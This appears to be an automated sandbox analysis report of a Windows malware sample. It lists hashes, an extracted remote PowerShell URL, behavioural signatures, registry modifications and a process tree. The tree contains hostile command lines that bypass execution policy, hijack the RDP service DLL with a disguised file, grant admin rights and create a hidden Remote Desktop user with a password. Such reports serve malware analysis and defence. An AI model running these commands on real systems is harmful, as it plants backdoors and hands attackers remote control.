Analysis
-
max time kernel
133s -
max time network
165s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-08-2021 05:19
Static task
static1
Behavioral task
behavioral1
Sample
1aa9dda1b9b413444b0668500611c7f3.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1aa9dda1b9b413444b0668500611c7f3.exe
Resource
win10v20210408
General
-
Target
1aa9dda1b9b413444b0668500611c7f3.exe
-
Size
7.2MB
-
MD5
1aa9dda1b9b413444b0668500611c7f3
-
SHA1
d980ac83bf107df1a7510ad94304a7e364d927a5
-
SHA256
02031c62d916cdd41d26a271e93ec5b06eabfa910187207b02ead07fd480c2a9
-
SHA512
37a301fd61c42c10f774950826469f215a20a24d783316febfeafd0fa06d88f536daa4d5d10153fd1ec42cc778d87716fe5b4bb9782c03e86a4e3b336e9efd53
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 1176 powershell.exe 19 1176 powershell.exe 20 1176 powershell.exe 21 1176 powershell.exe 23 1176 powershell.exe 25 1176 powershell.exe 27 1176 powershell.exe 29 1176 powershell.exe 31 1176 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
Uso.exe.comUso.exe.comUso.exe.compid process 2076 Uso.exe.com 3940 Uso.exe.com 1840 Uso.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2920 2920 -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Uso.exe.comdescription pid process target process PID 3940 set thread context of 1840 3940 Uso.exe.com Uso.exe.com -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8AF7.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B67.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B18.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8A98.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zqdv43pd.al1.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B08.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lprmbcq1.bu2.ps1 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2068 powershell.exe 2068 powershell.exe 2068 powershell.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 3680 powershell.exe 3680 powershell.exe 3680 powershell.exe 2068 powershell.exe 2068 powershell.exe 2068 powershell.exe 1176 powershell.exe 1176 powershell.exe 1176 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uso.exe.compowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1840 Uso.exe.com Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeIncreaseQuotaPrivilege 3236 powershell.exe Token: SeSecurityPrivilege 3236 powershell.exe Token: SeTakeOwnershipPrivilege 3236 powershell.exe Token: SeLoadDriverPrivilege 3236 powershell.exe Token: SeSystemProfilePrivilege 3236 powershell.exe Token: SeSystemtimePrivilege 3236 powershell.exe Token: SeProfSingleProcessPrivilege 3236 powershell.exe Token: SeIncBasePriorityPrivilege 3236 powershell.exe Token: SeCreatePagefilePrivilege 3236 powershell.exe Token: SeBackupPrivilege 3236 powershell.exe Token: SeRestorePrivilege 3236 powershell.exe Token: SeShutdownPrivilege 3236 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeSystemEnvironmentPrivilege 3236 powershell.exe Token: SeRemoteShutdownPrivilege 3236 powershell.exe Token: SeUndockPrivilege 3236 powershell.exe Token: SeManageVolumePrivilege 3236 powershell.exe Token: 33 3236 powershell.exe Token: 34 3236 powershell.exe Token: 35 3236 powershell.exe Token: 36 3236 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeIncreaseQuotaPrivilege 1916 powershell.exe Token: SeSecurityPrivilege 1916 powershell.exe Token: SeTakeOwnershipPrivilege 1916 powershell.exe Token: SeLoadDriverPrivilege 1916 powershell.exe Token: SeSystemProfilePrivilege 1916 powershell.exe Token: SeSystemtimePrivilege 1916 powershell.exe Token: SeProfSingleProcessPrivilege 1916 powershell.exe Token: SeIncBasePriorityPrivilege 1916 powershell.exe Token: SeCreatePagefilePrivilege 1916 powershell.exe Token: SeBackupPrivilege 1916 powershell.exe Token: SeRestorePrivilege 1916 powershell.exe Token: SeShutdownPrivilege 1916 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeSystemEnvironmentPrivilege 1916 powershell.exe Token: SeRemoteShutdownPrivilege 1916 powershell.exe Token: SeUndockPrivilege 1916 powershell.exe Token: SeManageVolumePrivilege 1916 powershell.exe Token: 33 1916 powershell.exe Token: 34 1916 powershell.exe Token: 35 1916 powershell.exe Token: 36 1916 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 powershell.exe Token: SeSecurityPrivilege 3680 powershell.exe Token: SeTakeOwnershipPrivilege 3680 powershell.exe Token: SeLoadDriverPrivilege 3680 powershell.exe Token: SeSystemProfilePrivilege 3680 powershell.exe Token: SeSystemtimePrivilege 3680 powershell.exe Token: SeProfSingleProcessPrivilege 3680 powershell.exe Token: SeIncBasePriorityPrivilege 3680 powershell.exe Token: SeCreatePagefilePrivilege 3680 powershell.exe Token: SeBackupPrivilege 3680 powershell.exe Token: SeRestorePrivilege 3680 powershell.exe Token: SeShutdownPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeSystemEnvironmentPrivilege 3680 powershell.exe Token: SeRemoteShutdownPrivilege 3680 powershell.exe Token: SeUndockPrivilege 3680 powershell.exe Token: SeManageVolumePrivilege 3680 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Uso.exe.comUso.exe.compid process 2076 Uso.exe.com 2076 Uso.exe.com 2076 Uso.exe.com 3940 Uso.exe.com 3940 Uso.exe.com 3940 Uso.exe.com -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
Uso.exe.comUso.exe.compid process 2076 Uso.exe.com 2076 Uso.exe.com 2076 Uso.exe.com 3940 Uso.exe.com 3940 Uso.exe.com 3940 Uso.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1aa9dda1b9b413444b0668500611c7f3.execmd.execmd.exeUso.exe.comUso.exe.comUso.exe.compowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.exedescription pid process target process PID 584 wrote to memory of 1088 584 1aa9dda1b9b413444b0668500611c7f3.exe dllhost.exe PID 584 wrote to memory of 1088 584 1aa9dda1b9b413444b0668500611c7f3.exe dllhost.exe PID 584 wrote to memory of 1088 584 1aa9dda1b9b413444b0668500611c7f3.exe dllhost.exe PID 584 wrote to memory of 504 584 1aa9dda1b9b413444b0668500611c7f3.exe cmd.exe PID 584 wrote to memory of 504 584 1aa9dda1b9b413444b0668500611c7f3.exe cmd.exe PID 584 wrote to memory of 504 584 1aa9dda1b9b413444b0668500611c7f3.exe cmd.exe PID 504 wrote to memory of 3168 504 cmd.exe cmd.exe PID 504 wrote to memory of 3168 504 cmd.exe cmd.exe PID 504 wrote to memory of 3168 504 cmd.exe cmd.exe PID 3168 wrote to memory of 2080 3168 cmd.exe findstr.exe PID 3168 wrote to memory of 2080 3168 cmd.exe findstr.exe PID 3168 wrote to memory of 2080 3168 cmd.exe findstr.exe PID 3168 wrote to memory of 2076 3168 cmd.exe Uso.exe.com PID 3168 wrote to memory of 2076 3168 cmd.exe Uso.exe.com PID 3168 wrote to memory of 2188 3168 cmd.exe PING.EXE PID 3168 wrote to memory of 2188 3168 cmd.exe PING.EXE PID 3168 wrote to memory of 2188 3168 cmd.exe PING.EXE PID 2076 wrote to memory of 3940 2076 Uso.exe.com Uso.exe.com PID 2076 wrote to memory of 3940 2076 Uso.exe.com Uso.exe.com PID 3940 wrote to memory of 1840 3940 Uso.exe.com Uso.exe.com PID 3940 wrote to memory of 1840 3940 Uso.exe.com Uso.exe.com PID 3940 wrote to memory of 1840 3940 Uso.exe.com Uso.exe.com PID 3940 wrote to memory of 1840 3940 Uso.exe.com Uso.exe.com PID 1840 wrote to memory of 2068 1840 Uso.exe.com powershell.exe PID 1840 wrote to memory of 2068 1840 Uso.exe.com powershell.exe PID 2068 wrote to memory of 3976 2068 powershell.exe csc.exe PID 2068 wrote to memory of 3976 2068 powershell.exe csc.exe PID 3976 wrote to memory of 2132 3976 csc.exe cvtres.exe PID 3976 wrote to memory of 2132 3976 csc.exe cvtres.exe PID 2068 wrote to memory of 3236 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 3236 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 1916 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 1916 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 3680 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 3680 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 4060 2068 powershell.exe reg.exe PID 2068 wrote to memory of 4060 2068 powershell.exe reg.exe PID 2068 wrote to memory of 192 2068 powershell.exe reg.exe PID 2068 wrote to memory of 192 2068 powershell.exe reg.exe PID 2068 wrote to memory of 212 2068 powershell.exe reg.exe PID 2068 wrote to memory of 212 2068 powershell.exe reg.exe PID 2068 wrote to memory of 1248 2068 powershell.exe net.exe PID 2068 wrote to memory of 1248 2068 powershell.exe net.exe PID 1248 wrote to memory of 3916 1248 net.exe net1.exe PID 1248 wrote to memory of 3916 1248 net.exe net1.exe PID 2068 wrote to memory of 2560 2068 powershell.exe cmd.exe PID 2068 wrote to memory of 2560 2068 powershell.exe cmd.exe PID 2560 wrote to memory of 3140 2560 cmd.exe cmd.exe PID 2560 wrote to memory of 3140 2560 cmd.exe cmd.exe PID 3140 wrote to memory of 3948 3140 cmd.exe net.exe PID 3140 wrote to memory of 3948 3140 cmd.exe net.exe PID 3948 wrote to memory of 1648 3948 net.exe net1.exe PID 3948 wrote to memory of 1648 3948 net.exe net1.exe PID 2068 wrote to memory of 1116 2068 powershell.exe cmd.exe PID 2068 wrote to memory of 1116 2068 powershell.exe cmd.exe PID 1116 wrote to memory of 3476 1116 cmd.exe cmd.exe PID 1116 wrote to memory of 3476 1116 cmd.exe cmd.exe PID 3476 wrote to memory of 3864 3476 cmd.exe net.exe PID 3476 wrote to memory of 3864 3476 cmd.exe net.exe PID 3864 wrote to memory of 2108 3864 net.exe net1.exe PID 3864 wrote to memory of 2108 3864 net.exe net1.exe PID 3960 wrote to memory of 2880 3960 cmd.exe net.exe PID 3960 wrote to memory of 2880 3960 cmd.exe net.exe PID 2880 wrote to memory of 2096 2880 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"2⤵PID:1088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx2⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx4⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comUso.exe.com B4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3D7.tmp" "c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\CSCC01F7819505B4CD38E2EBF3B2323F1.TMP"9⤵PID:2132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵PID:4060
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
PID:192 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵PID:212
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵PID:3916
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\net.exenet start rdpdr10⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵PID:1648
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.execmd /c net start TermService9⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\net.exenet start TermService10⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵PID:2108
-
C:\Windows\SysWOW64\PING.EXEping GFBFPSXA -n 304⤵
- Runs ping.exe
PID:2188
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:2096
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc n6UvtOVP /add1⤵PID:2764
-
C:\Windows\system32\net.exenet.exe user wgautilacc n6UvtOVP /add2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc n6UvtOVP /add3⤵PID:3968
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:2164
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:2716
-
